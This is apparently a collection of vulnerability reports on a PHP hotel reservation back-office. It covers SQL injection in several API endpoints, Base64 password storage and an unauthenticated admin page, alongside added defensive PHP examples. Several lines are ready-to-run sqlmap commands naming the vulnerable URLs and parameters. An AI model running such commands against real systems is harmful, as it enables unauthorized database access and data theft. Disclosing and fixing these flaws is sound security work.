fantasticlbp / hotels_server
Hotel reservation system back-office management system
The parameter was added with the string "username=" and passed to the function find.
In the definition of the function find, we can notice that though the author uses PDO, he didn't use the prepared-statement technique to avoid the SQL injection vulnerability. What a pity!
After analyzing this code, we can simply use sqlmap to exploit the vulnerability and have fun!
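The lookup shape the issue describes, the raw "username" value spliced into the SQL text, next to the PDO prepared-statement form the author missed. This is an added example, not code from hotels_server: it uses an in-memory SQLite database so it runs offline, and the table layout and the find*() signatures are assumptions for illustration.

```php
<?php
// Added example, not code from hotels_server. The users table and the
// findUnsafe()/findSafe() signatures are assumptions; the rows are constructed.

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT NOT NULL)');
$seed = $pdo->prepare('INSERT INTO users (username) VALUES (?)');
foreach (['alice', 'bob', "o'brien"] as $name) {   // constructed sample rows
    $seed->execute([$name]);
}

// Vulnerable shape: whatever the client sends becomes part of the statement,
// so any quote in the value rewrites the query instead of being matched.
function findUnsafe(PDO $pdo, string $username): array
{
    $sql = "SELECT id, username FROM users WHERE username = '" . $username . "'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened shape: the statement text is fixed at prepare time and the value is
// bound separately, so it can only ever be compared as data.
function findSafe(PDO $pdo, string $username): array
{
    $stmt = $pdo->prepare('SELECT id, username FROM users WHERE username = :username');
    $stmt->execute([':username' => $username]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$input = "o'brien";   // an ordinary value that happens to contain a quote
try {
    findUnsafe($pdo, $input);
} catch (PDOException $e) {
    // The quote ended the string literal early, so the statement no longer
    // means "match this name". A quote placed deliberately does the same,
    // which is exactly the condition sqlmap probes for.
    echo "unsafe: statement broke: " . $e->getMessage() . PHP_EOL;
}
$rows = findSafe($pdo, $input);
printf("safe: %d row(s), username=%s%s", count($rows), $rows[0]['username'], PHP_EOL);
```

Run it with `php find_example.php` (needs the pdo_sqlite extension). Against MySQL, also set `PDO::ATTR_EMULATE_PREPARES` to false so that binding happens on the server rather than by client-side quoting, and remember that only values can be bound: a column name or sort direction coming from the request still needs an allow-list check.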
SQL injection exists in /controller/api/RevokeOrder.php
sqlmap -u "http://10.211.55.10/controller/api/RevokeOrder.php?key=TheHotelReversationApplication&city=1&orderId=1"
author: [email protected]
SQL injection exists in /controller/api/orderList.php
sqlmap -u "http://10.211.55.10/controller/api/orderList.php?telephone=1&request=1"
author: [email protected]
SQL injection exists in /controller/api/Room.php (parameter hotelId)
sqlmap -u "http://10.211.55.10/controller/api/Room.php?key=TheHotelReversationApplication&hotelId=1"
author: [email protected]
URL /controller/api/Order.php has SQL injection
sqlmap -u "http://10.211.55.10/controller/api/Order.php?telephone=1&key=TheHotelReversationApplication&request=1"
author: [email protected]
How can I translate to English?
SQL injection exists in /controller/api/RandomHotel.php
sqlmap -u "http://10.211.55.10/controller/api/RandomHotel.php?key=TheHotelReversationApplication&city=1"
author: [email protected]
The application uses Base64 encoding for storage of passwords.
Obscuring a password with a trivial encoding does not protect the password.
https://cwe.mitre.org/data/definitions/261.html
https://paragonie.com/blog/2015/08/you-wouldnt-base64-a-password-cryptography-decoded
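An added example (not code from hotels_server) showing why Base64 is not protection and what the PHP standard library offers instead: a reversible encoding beside password_hash()/password_verify(), plus an assumed migration helper that swaps a legacy Base64 value for a real hash at the user's next successful login. The user record is constructed for illustration.

```php
<?php
// Added example, not code from hotels_server. The $row record and the
// upgradeLegacyPassword() helper are assumptions for illustration.

$stored = base64_encode('hunter2');    // what a Base64 "protected" column holds
$recovered = base64_decode($stored);   // anyone who reads the table gets the plaintext back
echo "base64 stored: $stored -> recovered: $recovered" . PHP_EOL;

// Hardened: a salted, deliberately slow, one-way hash. PASSWORD_DEFAULT is
// bcrypt today; the algorithm and cost are recorded inside the hash string,
// so password_verify() keeps working if the default changes later.
$hash = password_hash('hunter2', PASSWORD_DEFAULT);
var_dump(password_verify('hunter2', $hash));   // bool(true)
var_dump(password_verify('hunter3', $hash));   // bool(false)

// Migration helper (assumed): returns the hash that should now be stored for
// the user, or null when the submitted password is wrong. A real application
// would read and write the users table; here $row stands in for that record.
function upgradeLegacyPassword(array $row, string $submitted): ?string
{
    if (strpos($row['password'], '$') === 0) {
        // Already a password_hash() string; rehash only if the cost/algorithm is outdated.
        if (!password_verify($submitted, $row['password'])) {
            return null;
        }
        return password_needs_rehash($row['password'], PASSWORD_DEFAULT)
            ? password_hash($submitted, PASSWORD_DEFAULT)
            : $row['password'];
    }
    // Legacy Base64 column: decode strictly, compare in constant time, then hash.
    $legacy = base64_decode($row['password'], true);
    if ($legacy === false || !hash_equals($legacy, $submitted)) {
        return null;
    }
    return password_hash($submitted, PASSWORD_DEFAULT);
}

$row = ['username' => 'alice', 'password' => base64_encode('hunter2')];   // constructed legacy row
$newHash = upgradeLegacyPassword($row, 'hunter2');
var_dump($newHash !== null && password_verify('hunter2', $newHash));   // bool(true)
var_dump(upgradeLegacyPassword($row, 'wrong') === null);                // bool(true)
```

Once every active user has logged in once, the remaining Base64 rows can be forced through a password reset rather than decoded, so the plaintext never needs to be handled in bulk.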
In /controller/fetchpwd.php
It will receive a parameter called "username" to search for existing users.
But in fact, this parameter just becomes a part of the SQL request without any processing, so it will be possible to have a SQL injection.
We can use sqlmap to test this vulnerability:
sqlmap -u "http://192.168.31.91/controller/fetchpwd.php" --data "username=1" --dbms mysql -p username
GET parameter 'password' appears to be 'MySQL <= 5.0.11 AND time-based blind (heavy query)' injectable
PATH: http://localhost/Hotels_Server/controller/inscheck.php
PoC
/view/hotelList.php Unauthorized Access Vulnerability
Code:
No user authentication code.
Visit the link http://host/view/hotelList.php to view the back-end data.
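An added example (not code from hotels_server) of the authentication gate a back-office page such as /view/hotelList.php needs before it reads any data, together with the login step that establishes the session. The session key names, the login page path and the credential check are assumptions.

```php
<?php
// Added example, not code from hotels_server. Session keys, the login URL and
// the way the admin id is obtained are assumptions for illustration.

// Called once after the credentials have been verified elsewhere.
function loginAdmin(string $adminId): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    // Rotate the session id at the privilege change so an id issued before
    // login cannot be reused to ride the authenticated session.
    session_regenerate_id(true);
    $_SESSION['admin_id'] = $adminId;
    $_SESSION['logged_in_at'] = time();
}

// Call at the very top of every protected view and API handler. Returns true
// when the request may proceed; otherwise the redirect has already been sent
// and the caller must stop without emitting any data.
function requireAdmin(string $loginUrl = '/view/login.php', int $maxAge = 3600): bool
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    $ok = !empty($_SESSION['admin_id'])
        && isset($_SESSION['logged_in_at'])
        && (time() - $_SESSION['logged_in_at']) <= $maxAge;
    if (!$ok) {
        session_unset();
        header('Location: ' . $loginUrl, true, 302);
        return false;
    }
    return true;
}

// Assumed shape of the top of hotelList.php:
if (!requireAdmin()) {
    exit;
}
// ...only now query and render the hotel list...
```

The gate has to sit before the first database call, not after the HTML is generated, and the same check belongs in the /controller/api/* handlers, since a data endpoint reachable without a session leaks the same records as the view does.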